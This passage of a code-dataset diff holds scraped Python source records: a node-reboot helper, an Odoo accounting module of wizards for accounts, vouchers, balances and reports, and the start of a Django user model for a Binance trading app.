diff --git "a/4551.jsonl" "b/4551.jsonl" new file mode 100644--- /dev/null +++ "b/4551.jsonl" @@ -0,0 +1,2411 @@ +{"seq_id":"37767767048","text":"from remote_host import (RemoteHost, module_print)\n\nclass RebootToAhv(object):\n \"\"\"\n Base class to perform operations on reboot to Ahv.\n \"\"\"\n def __init__(self, options):\n self.options = options\n self.host = None\n\n def reboot_to_ahv(self):\n \"\"\"\n Reboots specified node into Ahv.\n Returns:\n True: Node successfully booted into Ahv.\n False: Error rebooting node into Ahv.\n Raises:\n StandardError\n \"\"\"\n self.host = RemoteHost.get_instance(self.options)\n if not self.host:\n module_print(\"Unable to get the Remote Host type\")\n return False\n import json\n with open(self.options.config, \"r\") as f:\n cfg = json.load(f)\n ret, err = self.host.reboot_to_target(target=\"ahv\", config=cfg)\n if not ret:\n module_print(\"Unable to boot node [%s] into Ahv err: [%s]\" %\n (self.options.node_ip, err))\n return False\n\n # wait for node to boot into Ahv\n module_print(\"Successfully booted into Ahv\")\n return True\n","repo_name":"sarabjit-saini/griffon-poc","sub_path":"provider/src/reboot_to_ahv.py","file_name":"reboot_to_ahv.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1499471000","text":"# -*- coding: utf-8 -*-\nfrom decimal import Decimal\nimport json\nfrom odoo import api\nfrom odoo import exceptions\nfrom odoo import fields\nfrom odoo import models\nfrom ..models.main_models import AccountsBalance\nfrom ..models.main_models import Voucher\nfrom ..models.ac_period import Period\nfrom ..models.main_models import Glob_tag_Model\n\n\n# 向导部分-开始\n# 新增下级科目的向导\nclass CreateChildAccountWizard(models.TransientModel, Glob_tag_Model):\n '''新增下级科目的向导'''\n _name = 'accountcore.create_child_account'\n _description = '新增下级科目向导'\n fatherAccountId = fields.Many2one('accountcore.account',\n string='上级科目',\n help='新增科目的直接上级科目')\n fatherAccountNumber = fields.Char(related='fatherAccountId.number',\n string='上级科目编码')\n\n org = fields.Many2one('accountcore.org',\n string='所属机构',\n help=\"科目所属机构\",\n index=True,\n ondelete='restrict')\n\n accountsArch = fields.Many2one('accountcore.accounts_arch',\n string='所属科目体系',\n help=\"科目所属体系\",\n index=True,\n ondelete='restrict')\n\n accountClass = fields.Many2one('accountcore.accountclass',\n string='科目类别',\n index=True,\n ondelete='restrict')\n number = fields.Char(string='科目编码', required=True)\n name = fields.Char(string='科目名称', required=True)\n direction = fields.Selection([('1', '借'),\n ('-1', '贷')],\n string='余额方向',\n required=True)\n is_show = fields.Boolean(string='凭证中显示', default=True)\n cashFlowControl = fields.Boolean(string='分配现金流量')\n itemClasses = fields.Many2many('accountcore.itemclass',\n string='包含的核算项目类别',\n help=\"录入凭证时,提示选择该类别下的核算项目\",\n ondelete='restrict')\n accountItemClass = fields.Many2one('accountcore.itemclass',\n string='作为明细科目的类别',\n help=\"录入凭证分录时必须输入的该类别下的一个核算项目,作用相当于明细科目\",\n ondelete='restrict')\n explain = fields.Html(string='科目说明')\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n fatherAccountId = self.env.context.get('active_id')\n fatherAccount = self.env['accountcore.account'].sudo().search(\n [['id', '=', fatherAccountId]])\n default['accountsArch'] = fatherAccount.accountsArch.id\n default['fatherAccountId'] = fatherAccountId\n default['org'] = fatherAccount.org.id\n default['accountClass'] = 
fatherAccount.accountClass.id\n default['direction'] = fatherAccount.direction\n default['cashFlowControl'] = fatherAccount.cashFlowControl\n default['number'] = fatherAccount.number + \\\n '.' + str(fatherAccount.currentChildNumber)\n return default\n\n @api.model\n def create(self, values):\n if 'name' in values:\n if '-' in values['name']:\n raise exceptions.ValidationError(\"科目名称中不能含有'-'字符\")\n if ' ' in values['name']:\n raise exceptions.ValidationError(\"科目名称中不能含有空格\")\n fatherAccountId = self.env.context.get('active_id')\n accountTable = self.env['accountcore.account'].sudo()\n fatherAccount = accountTable.search(\n [['id', '=', fatherAccountId]])\n newAccount = {'fatherAccountId': fatherAccountId,\n 'org': fatherAccount.org.id,\n 'accountClass': fatherAccount.accountClass.id,\n 'cashFlowControl': values['cashFlowControl'],\n 'name': fatherAccount.name+'---'+values['name'],\n 'direction': fatherAccount.direction,\n 'number': fatherAccount.number + '.'\n + str(fatherAccount.currentChildNumber)}\n fatherAccount.currentChildNumber = fatherAccount.currentChildNumber+1\n values.update(newAccount)\n rl = super(CreateChildAccountWizard, self).create(values)\n a = accountTable.create(values)\n # 添加到上级科目的直接下级\n fatherAccount.write({'childs_ids': [(4, a.id)], 'is_show': False})\n return rl\n\n\n# 用户设置模型字段的默认取值向导(如,设置凭证默认值)\nclass AccountcoreUserDefaults(models.TransientModel):\n '''用户设置模型字段的默认取值向导'''\n _name = 'accountcoure.userdefaults'\n _description = '用户设置模型字段默认值'\n default_ruleBook = fields.Many2many('accountcore.rulebook',\n string='默认凭证标签')\n default_org = fields.Many2one('accountcore.org',\n string='默认机构')\n default_voucherDate = fields.Date(string='记账日期',\n default=fields.Date.today())\n default_real_date = fields.Date(string='业务日期')\n\n # 设置新增凭证,日期,机构和账套字段的默认值\n def setDefaults(self):\n modelName = 'accountcore.voucher'\n self._setDefault(modelName,\n 'ruleBook',\n self.default_ruleBook.ids)\n self._setDefault(modelName,\n 'org',\n self.default_org.id)\n self._setDefault(modelName, 'voucherdate',\n json.dumps(self.default_voucherDate.strftime('%Y-%m-%d')))\n if self.default_real_date:\n self._setDefault(modelName, 'real_date',\n json.dumps(self.default_real_date.strftime('%Y-%m-%d')))\n self.env.user.currentOrg = self.default_org.id\n self.env.user.current_date = self.default_voucherDate\n return True\n\n # 设置默认值\n def _setDefault(self, modelName, fieldName, defaultValue):\n idOfField = self._getIdOfIdField(fieldName,\n modelName,)\n rd = self._getDefaultRecord(idOfField)\n if rd.exists():\n self._modifyDefault(rd, idOfField, defaultValue)\n else:\n self._createDefault(idOfField, defaultValue)\n\n # 获取要设置默认值的字段在ir.model.fields中的id\n def _getIdOfIdField(self, fieldName, modelname):\n domain = [('model', '=', modelname),\n ('name', '=', fieldName)]\n rds = self.env['ir.model.fields'].sudo().search(domain, limit=1)\n return rds.id\n\n # 是否已经设置过该字段的默认值\n def _getDefaultRecord(self, id):\n domain = [('field_id', '=', id),\n ('user_id', '=', self.env.uid)]\n rds = self.env['ir.default'].sudo().search(domain, limit=1)\n return rds\n\n def _modifyDefault(self, rd, idOfField, defaultValue):\n rd.write({\n 'field_id': idOfField,\n 'json_value': defaultValue,\n 'user_id': self.env.uid\n })\n\n def _createDefault(self, idOfField, defaultValue):\n self.env['ir.default'].sudo().create({\n 'field_id': idOfField,\n 'json_value': defaultValue,\n 'user_id': self.env.uid\n })\n\n\n# 设置用户默认凭证编码策略向导\nclass NumberStaticsWizard(models.TransientModel):\n '''设置用户默认凭证编码策略向导'''\n _name = 
'accountcore.voucher_number_statics_default'\n _description = '设置用户默认凭证编码策略向导'\n voucherNumberTastics = fields.Many2one('accountcore.voucher_number_tastics',\n string='用户默认凭证编码策略')\n\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n default['voucherNumberTastics'] = self.env.user.voucherNumberTastics.id\n return default\n\n def setVoucherNumberTastics(self, args):\n currentUserId = self.env.uid\n currentUserTable = self.env['res.users'].sudo().browse(currentUserId)\n currentUserTable.write(\n {'voucherNumberTastics': self. voucherNumberTastics.id})\n return True\n\n\n# 设置凭证编号向导\nclass SetingVoucherNumberWizard(models.TransientModel):\n '''设置凭证编号向导'''\n _name = 'accountcore.seting_vouchers_number'\n _description = '设置凭证编号向导'\n voucherNumberTastics = fields.Many2one('accountcore.voucher_number_tastics',\n '要使用的凭证编码策略',\n required=True)\n startNumber = fields.Integer(string='从此编号开始', default=1, required=True)\n\n @api.model\n def default_get(self, field_names):\n '''获得用户的默认凭证编号策略'''\n default = super().default_get(field_names)\n if self.env.user.voucherNumberTastics:\n default['voucherNumberTastics'] = self.env.user.voucherNumberTastics.id\n return default\n\n def setingNumber(self, args):\n startNumber = self.startNumber\n numberTasticsId = self.voucherNumberTastics.id\n vouchers = self.env['accountcore.voucher'].sudo().browse(\n args['active_ids'])\n vouchers.sorted(key=lambda r: r.sequence)\n if startNumber <= 0:\n startNumber = 1\n for voucher in vouchers:\n oldstr = voucher.numberTasticsContainer_str\n voucher.numberTasticsContainer_str = Voucher.getNewNumberDict(\n oldstr,\n numberTasticsId,\n startNumber)\n startNumber += 1\n return {'name': '已生成凭证编号',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'accountcore.voucher',\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', args['active_ids'])]\n }\n\n\n# 设置单张凭证编号向导\nclass SetingVoucherNumberSingleWizard(models.TransientModel):\n '''设置单张凭证编号向导'''\n _name = 'accountcore.seting_voucher_number_single'\n _description = '设置单张凭证编号向导'\n newNumber = fields.Integer(string='新凭证编号', required=True)\n\n def setVoucherNumberSingle(self, argsDist):\n '''设置修改凭证编号'''\n newNumber = self.newNumber\n currentUserNumberTastics_id = 0\n if(self.env.user.voucherNumberTastics):\n currentUserNumberTastics_id = self.env.user.voucherNumberTastics.id\n voucher = self.env['accountcore.voucher'].sudo().browse(\n argsDist['active_id'])\n voucher.numberTasticsContainer_str = Voucher.getNewNumberDict(\n voucher.numberTasticsContainer_str,\n currentUserNumberTastics_id,\n newNumber)\n return True\n\n\n# 科目余额查询向导\nclass GetAccountsBalance(models.TransientModel):\n '''科目余额查询向导'''\n _name = 'accountcore.get_account_balance'\n _description = '科目查询向导'\n startDate = fields.Date(string=\"开始期间\")\n endDate = fields.Date(string=\"结束期间\")\n fast_period = fields.Date(string=\"选取期间\", store=False)\n onlyShowOneLevel = fields.Boolean(string=\"只显示一级科目\", default=False)\n summaryLevelByLevel = fields.Boolean(string='逐级汇总科目',\n default=True,\n readonly=True)\n includeAccountItems = fields.Boolean(string='包含核算项目', default=True)\n no_show_no_hanppend = fields.Boolean(string='隐藏无发生额的科目', default=False)\n order_orgs = fields.Boolean(string='多机构分开显示', default=False)\n noShowZeroBalance = fields.Boolean(string='隐藏余额为零的科目', default=False)\n noShowNoAmount = fields.Boolean(\n string='没有任何金额不显示', default=True)\n sum_orgs = fields.Boolean(\n string='多机构合并显示', default=False)\n orgs = fields.Many2many(\n 
'accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True\n\n )\n account = fields.Many2many('accountcore.account',\n string='科目范围',\n required=True)\n\n @api.multi\n def getReport(self, args):\n '''查询科目余额'''\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if len(self.account) == 0:\n self.account = self.env['accountcore.account'].search([])\n # raise exceptions.ValidationError('你需要选择查询的科目范围!')\n # return False\n self._setDefaultDate()\n [data] = self.read()\n datas = {\n 'form': data\n }\n return self.env.ref('accountcore.accounctore_accountsbalance_report').report_action([], data=datas)\n\n def _setDefaultDate(self):\n if not self.startDate:\n self.startDate = '1970-01-01'\n if not self.endDate:\n self.endDate = '9999-12-31'\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n\n# 科目明细账查询向导\nclass GetSubsidiaryBook(models.TransientModel):\n \"科目明细账查询向导\"\n _name = 'accountcore.get_subsidiary_book'\n _description = '科目明细账查询向导'\n startDate = fields.Date(string='开始月份')\n endDate = fields.Date(string='结束月份')\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many('accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True)\n account = fields.Many2one(\n 'accountcore.account', string='查询的科目', required=True)\n only_this_level = fields.Boolean(string='只包含本级科目', default=False)\n item = fields.Many2one('accountcore.item', string='查询的核算项目')\n voucher_number_tastics = fields.Many2one('accountcore.voucher_number_tastics',\n string='凭证号策略',\n required=True,\n default=lambda s: s.env.user.voucherNumberTastics)\n\n @api.multi\n def getReport(self, *args):\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if not self.account:\n raise exceptions.ValidationError('你需要选择查询的科目!')\n return False\n if not self.voucher_number_tastics:\n raise exceptions.ValidationError('你需要选择查询凭证编码策略!')\n return False\n self._setDefaultDate()\n [data] = self.read()\n datas = {\n 'form': data\n }\n return self.env.ref('accountcore.subsidiarybook_report').report_action([], data=datas)\n\n def _setDefaultDate(self):\n if not self.startDate:\n self.startDate = '1970-01-01'\n if not self.endDate:\n self.endDate = '9999-12-31'\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n\n# 自动结转损益向导\nclass currencyDown_sunyi(models.TransientModel):\n \"自动结转损益向导\"\n _name = 'accountcore.currency_down_sunyi'\n _description = '自动结转损益向导'\n startDate = fields.Date(string='开始月份', required=True)\n endDate = fields.Date(string='结束月份', required=True)\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many(\n 'accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg, required=True)\n\n # def soucre(self):\n # return self.env.ref('rulebook_1')\n\n @api.multi\n def do(self, *args):\n '''执行结转损益'''\n self.ensure_one()\n if len(self.orgs) == 0:\n raise exceptions.ValidationError('你还没选择机构范围!')\n return False\n if self.startDate > self.endDate:\n raise exceptions.ValidationError('你选择的开始日期不能大于结束日期')\n\n # 获得需要结转的会计期间\n periods = Period(self.startDate, self.endDate).getPeriodList()\n\n self.t_entry = self.env['accountcore.entry']\n # 本年利润科目\n self.ben_nian_li_run_account = self.env['accountcore.special_accounts'].sudo().search([\n ('name', '=', '本年利润科目')]).accounts\n if self.ben_nian_li_run_account:\n 
self.ben_nian_li_run_account_id = self.ben_nian_li_run_account.id\n else:\n self.ben_nian_li_run_account_id = self.env.ref(\n 'special_accounts_1')\n # 损益调整科目\n self.sun_yi_tiao_zhen_account = self.env['accountcore.special_accounts'].sudo().search([\n ('name', '=', '以前年度损益调整科目')]).accounts\n if self.sun_yi_tiao_zhen_account:\n self.sun_yi_tiao_zhen_account_id = self.sun_yi_tiao_zhen_account.id\n else:\n self.sun_yi_tiao_zhen_account_id = self.env.ref(\n 'special_accounts_3')\n # 依次处理选种机构\n # 生成的凭证列表\n voucher_ids = []\n for org in self.orgs:\n # 依次处理会计期间\n for p in periods:\n voucher = self._do_currencyDown(org, p)\n if voucher:\n voucher_ids.append(voucher.id)\n\n return {'name': '自动生成的结转损益凭证',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'accountcore.voucher',\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', voucher_ids)]\n }\n\n def _do_currencyDown(self, org, voucher_period):\n '''结转指定机构某会计期间的损益'''\n\n # 找出损益类相关科目\n accounts = self._get_sunyi_accounts(org)\n # 获得损益类相关科目在期间的余额\n accountsBalance = self._get_balances(org, voucher_period, accounts)\n # 根据余额生成结转损益的凭证\n voucher = self._creat_voucher(accountsBalance, org, voucher_period)\n return voucher\n\n def _get_sunyi_accounts(self, org):\n '''获得该机构的结转损益类科目'''\n # 属于损益类别的科目,但不包括\"以前年度损益调整\"\n accounts = self.env['accountcore.account'].sudo().search([('accountClass.name', '=', '损益类'),\n ('id', '!=',\n # self.sun_yi_tiao_zhen_account.id),\n self.sun_yi_tiao_zhen_account_id),\n '|', ('org',\n '=', org.id),\n ('org', '=', False)])\n return accounts\n\n def _get_balances(self, org, vouhcer_period, accounts):\n '''获得某一机构在一个会计月份的余额记录'''\n accountsBalance = []\n for account in accounts:\n if not account.accountItemClass:\n balance = account.getBalanceOfVoucherPeriod(vouhcer_period,\n org,\n None)\n if balance:\n accountsBalance.append(balance)\n else:\n items = account.getAllItemsInBalancesOf(org)\n if items:\n for item in items:\n balance = account.getBalanceOfVoucherPeriod(vouhcer_period,\n org,\n item)\n if balance:\n accountsBalance.append(balance)\n return accountsBalance\n\n def _creat_voucher(self, accountsBalance, org, voucer_period):\n '''新增结转损益凭证'''\n # 结转到本年利润的借方合计\n zero = Decimal.from_float(0).quantize(Decimal('0.00'))\n sum_d = Decimal.from_float(0).quantize(Decimal('0.00'))\n # 结转到本年利润的贷方合计\n sum_c = Decimal.from_float(0).quantize(Decimal('0.00'))\n\n entrys_value = []\n # 根据科目余额生成分录\n for b in accountsBalance:\n b_items_id = []\n if b.items.id:\n b_items_id = [b.items.id]\n endAmount = Decimal.from_float(b.endDamount).quantize(\n Decimal('0.00'))-Decimal.from_float(b.endCamount).quantize(Decimal('0.00'))\n if b.account.direction == '1':\n if endAmount != zero:\n\n entrys_value.append({\"explain\": '结转损益',\n \"account\": b.account.id,\n \"items\": [(6, 0, b_items_id)],\n \"camount\": endAmount\n })\n sum_d = sum_d + endAmount\n else:\n if endAmount != zero:\n entrys_value.append({\"explain\": '结转损益',\n \"account\": b.account.id,\n \"items\": [(6, 0, b_items_id)],\n \"damount\": -endAmount\n })\n sum_c = sum_c - endAmount\n # 本年利润科目分录\n\n # 结转到贷方\n if sum_d != zero:\n entrys_value.append({\"explain\": '结转损益',\n # \"account\": self.ben_nian_li_run_account.id,\n \"account\": self.ben_nian_li_run_account_id,\n \"damount\": sum_d\n })\n # 结转到借方\n if sum_c != zero:\n entrys_value.append({\"explain\": '结转损益',\n # \"account\": self.ben_nian_li_run_account.id,\n \"account\": self.ben_nian_li_run_account_id,\n \"camount\": sum_c\n })\n if len(entrys_value) < 2:\n return None\n entrys = 
self.t_entry.sudo().create(entrys_value)\n voucher = self.env['accountcore.voucher'].sudo().create({\n 'voucherdate': voucer_period.endDate,\n 'org': org.id,\n 'soucre': self.env.ref('accountcore.source_2').id,\n 'ruleBook': [(6, 0, [self.env.ref('accountcore.rulebook_1').id])],\n 'entrys': [(6, 0, entrys.ids)],\n 'createUser': self.env.uid,\n })\n return voucher\n\n\n# 启用期初试算平衡向导\nclass BeginBalanceCheck(models.TransientModel):\n '''启用期初试算平衡向导'''\n _name = 'accountcore.begin_balance_check'\n _description = '启用期初试算平衡向导'\n org_ids = fields.Many2many('accountcore.org',\n string='待检查机构',\n required=True,\n default=lambda s: s.env.user.currentOrg)\n result = fields.Html(string='检查结果')\n\n @api.multi\n def do_check(self, *args):\n '''对选中机构执行平衡检查'''\n self.ensure_one()\n check_result = {}\n result_htmlStr = ''\n for org in self.org_ids:\n check_result[org.name] = self._check(org)\n for (key, value) in check_result.items():\n result_htmlStr = result_htmlStr+\"
\" + \\\n key+\"
\"+\"\".join([v[1] for v in value])\n self.result = result_htmlStr\n return {\n 'name': '启用期初平衡检查',\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'new',\n 'res_model': 'accountcore.begin_balance_check',\n 'res_id': self.id,\n }\n\n def _check(self, org):\n '''对一个机构执行平衡检查'''\n rl = []\n # 获得机构期初\n balance_records = AccountsBalance.getBeginOfOrg(org)\n # 检查月初本年累计发生额借方合计=贷方合计\n rl.append(self._checkCumulativeAmountBalance(balance_records))\n # 检查月初余额借方合计=贷方合计\n rl.append(self._checkBeginingAmountBalance(balance_records))\n # 检查月已发生额借方合计=贷方合计\n rl.append(self._checkAmountBalance(balance_records))\n # 检查资产=负债+所有者权益+收入-理论\n rl.append(self._checkBalance(balance_records))\n return rl\n\n def _checkCumulativeAmountBalance(self, balance_records):\n '''检查月初本年累计发生额借方合计'''\n damount = AccountsBalance._sumFieldOf(\n 'cumulativeDamount', balance_records)\n camount = AccountsBalance._sumFieldOf(\n 'cumulativeCamount', balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
<p>月初本年借方累计发生额=月初本年贷方累计发生额[\" + \\\n                str(damount) + \"=\"+str(camount)+\"]</p>
\"\n return (True, rl_html)\n else:\n rl_html = \"
<p>月初本年借方累计发生额合计=月初本年贷方累计发生额合计[\" + \\\n                str(damount)+\"-\" + str(camount) + \\\n                \"=\"+str(imbalanceAmount)+\"]</p>
\"\n return (False, rl_html)\n\n def _checkBeginingAmountBalance(self, balance_records):\n '''检查月初余额借方合计'''\n damount = AccountsBalance._sumFieldOf('beginingDamount',\n balance_records)\n camount = AccountsBalance._sumFieldOf('beginingCamount',\n balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
<p>月初借方余额合计=月初贷方余额合计[\" + \\\n                str(damount) + \"=\" + str(camount) + \"]</p>
\"\n return (True, rl_html)\n else:\n rl_html = \"
<p>月初借方余额合计=月初贷方余额合计[\" + \\\n                str(damount) + \"-\" + str(camount) + \\\n                \"=\"+str(imbalanceAmount)+\"]</p>
\"\n return (False, rl_html)\n\n def _checkAmountBalance(self, balance_records):\n '''检查月已发生额借方合计'''\n damount = AccountsBalance._sumFieldOf('damount',\n balance_records)\n camount = AccountsBalance._sumFieldOf('camount',\n balance_records)\n imbalanceAmount = damount-camount\n if imbalanceAmount == 0:\n rl_html = \"
<p>月借方已发生额合计=月贷方已发生额合计[\" + \\\n                str(damount) + \"=\" + str(camount) + \"]</p>
\"\n return (True, rl_html)\n else:\n rl_html = \"
<p>月借方已发生额合计=月贷方已发生额合计[\" + \\\n                str(damount) + \"-\" + str(camount) + \\\n                \"=\"+str(imbalanceAmount)+\"]</p>
\"\n return (False, rl_html)\n\n def _checkBalance(self, balance_records):\n '''检查资产=负债+所有者权益+收入-成本'''\n return (True, \".....\")\n\n\n# 新增下级现金流量向导\nclass CreateChildCashoFlowWizard(models.TransientModel, Glob_tag_Model):\n '''新增下级现金流量的向导'''\n _name = 'accountcore.create_child_cashflow'\n _description = '新增下级现金流量向导'\n parent_id = fields.Many2one('accountcore.cashflow',\n string='上级现金流量名称',\n help='新增现金流量的直接上级科目')\n parent_number = fields.Char(related='parent_id.number',\n string='上级现金流量编码')\n\n cash_flow_type = fields.Many2one('accountcore.cashflowtype',\n string='现金流量类别',\n index=True,\n ondelete='restrict')\n number = fields.Char(string='现金流量编码', required=True)\n name = fields.Char(string='现金流量名称', required=True)\n direction = fields.Selection(\n [(\"-1\", \"流出\"), (\"1\", \"流入\")], string='流量方向', required=True)\n\n @api.model\n def default_get(self, field_names):\n default = super().default_get(field_names)\n parent_id = self.env.context.get('active_id')\n parent = self.env['accountcore.cashflow'].sudo().search(\n [['id', '=', parent_id]])\n default['parent_id'] = parent_id\n default['cash_flow_type'] = parent.cashFlowType.id\n default['direction'] = parent.direction\n default['number'] = parent.number + \\\n '.' + str(parent.currentChildNumber)\n return default\n\n @api.model\n def create(self, values):\n parent_id = self.env.context.get('active_id')\n Table = self.env['accountcore.cashflow'].sudo()\n parent = Table.search(\n [['id', '=', parent_id]])\n newOne = {'parent_id': parent_id,\n 'cashFlowType': parent.cashFlowType.id,\n 'name': parent.name+'---'+values['name'],\n 'number': parent.number + '.'\n + str(parent.currentChildNumber),\n 'direction': parent.direction}\n parent.currentChildNumber = parent.currentChildNumber+1\n values.update(newOne)\n rl = super(CreateChildCashoFlowWizard, self).create(values)\n a = Table.create(values)\n # 添加到上级科目的直接下级\n parent.write({'childs_ids': [(4, a.id)]})\n return rl\n\n # 向导部分-结束\n\n\n# 报表生成向导\nclass GetReport(models.TransientModel):\n \"报表生成向导\"\n _name = 'accountcore.get_report'\n _description = '报表生成向导'\n report_model = fields.Many2one('accountcore.report_model',\n string='报表模板')\n guid = fields.Char(related='report_model.guid')\n summary = fields.Text(related='report_model.summary')\n startDate = fields.Date(string='开始月份')\n endDate = fields.Date(string='结束月份')\n fast_period = fields.Date(string=\"选取期间\", store=False)\n orgs = fields.Many2many('accountcore.org',\n string='机构范围',\n default=lambda s: s.env.user.currentOrg,\n required=True)\n\n def do(self):\n '''根据模板生成报表'''\n return {\n 'name': \"生成报表\",\n 'type': 'ir.actions.act_window',\n 'res_model': 'accountcore.report_model',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'current',\n 'res_id': self.report_model.id,\n 'context': {\n 'form_view_initial_mode': 'edit',\n 'start_data': self.startDate,\n 'end_data': self.endDate,\n 'orgs': self.orgs.ids,\n }\n }\n\n# 设置报表模板公式向导\n\n\nclass ReportModelFormula(models.TransientModel):\n '''设置报表公式向导'''\n _name = 'accountcore.reportmodel_formula'\n _description = '设置报表公式向导'\n account_id = fields.Many2one('accountcore.account', string='会计科目')\n has_child = fields.Boolean(string='是否包含明细科目', default=True)\n item_ids = fields.Many2many('accountcore.item', string='作为明细科目的核算项目')\n account_amount_type = fields.Many2one('accountcore.account_amount_type',\n string='金额类型')\n formula = fields.Text(string='公式内容')\n btn_join_reduce = fields.Char()\n btn_join_add = fields.Char()\n btn_clear = fields.Char()\n @api.model\n def default_get(self, 
field_names):\n default = super().default_get(field_names)\n if self.env.context.get('ac'):\n default['formula'] = self.env.context.get('ac')\n return default\n\n def do(self):\n '''公式填入单元格'''\n return {\n 'type': 'ir.actions.client',\n 'name': '',\n 'tag': 'update_formula',\n 'target': 'new',\n 'context': {'accountName': self.formula}\n }\n\n @api.onchange('btn_join_reduce')\n def join_reduce(self):\n '''减进公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_join_reduce:\n return\n if not self.account_id.name:\n return {\n 'warning': {\n 'message': \"请选择会计科目\",\n },\n }\n if not self.account_amount_type:\n return {\n 'warning': {\n 'message': \"请选择金额类型\",\n },\n }\n items = ''\n for i in self.item_ids:\n items = items+i.name+'/'\n mark = \"-\"\n if not self.formula:\n self.formula = \"\"\n self.formula = (self.formula+mark+\"account('\"\n + self.account_id.name\n + \"','\"+str(self.has_child)\n + \"','\"+self.account_amount_type.name\n + \"','\"+items\n + \"')\")\n\n @api.onchange('btn_join_add')\n def join_add(self):\n '''加进公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_join_add:\n return\n if not self.account_id.name:\n return {\n 'warning': {\n 'message': \"请选择会计科目\",\n },\n }\n if not self.account_amount_type:\n return {\n 'warning': {\n 'message': \"请选择金额类型\",\n },\n }\n items = ''\n for i in self.item_ids:\n items = items+i.name+'/'\n mark = \"\"\n if self.formula:\n mark = \"+\"\n else:\n self.formula = \"\"\n self.formula = (self.formula+mark+\"account('\"\n + self.account_id.name\n + \"','\"+str(self.has_child)\n + \"','\"+self.account_amount_type.name\n + \"','\"+items\n + \"')\")\n\n @api.onchange('btn_clear')\n def join_clear(self):\n '''清除公式'''\n # 窗口弹出时不执行,直接返回\n if not self.btn_clear:\n return\n self.formula = \"\"\n","repo_name":"123wj2003/accountcore","sub_path":"wizard/wizards.py","file_name":"wizards.py","file_ext":"py","file_size_in_byte":36382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"34252636453","text":"from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.db import models\nfrom datetime import datetime\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.utils.translation import ugettext_lazy as _\nfrom binance.enums import *\nfrom binance.client import Client\nfrom unixtimestampfield.fields import UnixTimeStampField\nimport math, time\nclass UserManager(BaseUserManager):\n \"\"\"ユーザーマネージャー.\"\"\"\n\n use_in_migrations = True\n\n def _create_user(self, email, password, **extra_fields):\n \"\"\"メールアドレスでの登録を必須にする\"\"\"\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_user(self, email, password=None, **extra_fields):\n \"\"\"is_staff(管理サイトにログインできるか)と、is_superuer(全ての権限)をFalseに\"\"\"\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(email, password, **extra_fields)\n\n def create_superuser(self, email, password, **extra_fields):\n \"\"\"スーパーユーザーは、is_staffとis_superuserをTrueに\"\"\"\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') 
is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(email, password, **extra_fields)\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \n email = models.EmailField(_('メールアドレス'), unique=True)\n api_key = models.CharField(_('API KEY'), max_length=255, blank=True, null = True)\n api_secret_key = models.CharField(_('API SECRET KEY'), max_length=255, blank=True, null = True)\n \n do_btc = models.BooleanField(\n verbose_name = 'BTC',\n default = True\n )\n btc_unit_amount = models.FloatField(\n default = 0.001\n )\n do_eth = models.BooleanField(\n verbose_name = 'ETH',\n default = True\n )\n eth_unit_amount = models.FloatField(\n default = 0.001\n )\n \n do_usdt = models.BooleanField(\n verbose_name = 'USTD',\n default = True\n )\n usdt_unit_amount = models.FloatField(\n default = 0.001\n )\n \n do_bnb = models.BooleanField(\n verbose_name = 'BNB',\n default = True\n )\n bnb_unit_amount = models.FloatField(\n default = 0.001\n )\n \n max_quantity_rate = models.FloatField(\n verbose_name = '取引上限%',\n default = 0.5\n )\n\n target_profit_rate = models.FloatField(\n verbose_name = '取引施行利益',\n default = 0.5\n )\n\n auto_trading = models.BooleanField(\n verbose_name = '自動取引',\n default = False\n )\n max_active_scenario = models.IntegerField(\n verbose_name = '最大シナリオ数',\n default = 10\n )\n commission_rate = models.FloatField(\n verbose_name = '手数料',\n default = 0.075\n )\n\n is_staff = models.BooleanField(\n _('管理者'),\n default=False,\n help_text=_(\n 'Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField(\n _('利用開始'),\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. '\n 'Unselect this instead of deleting accounts.'\n ),\n )\n\n objects = UserManager()\n\n EMAIL_FIELD = 'email'\n USERNAME_FIELD = 'email'\n 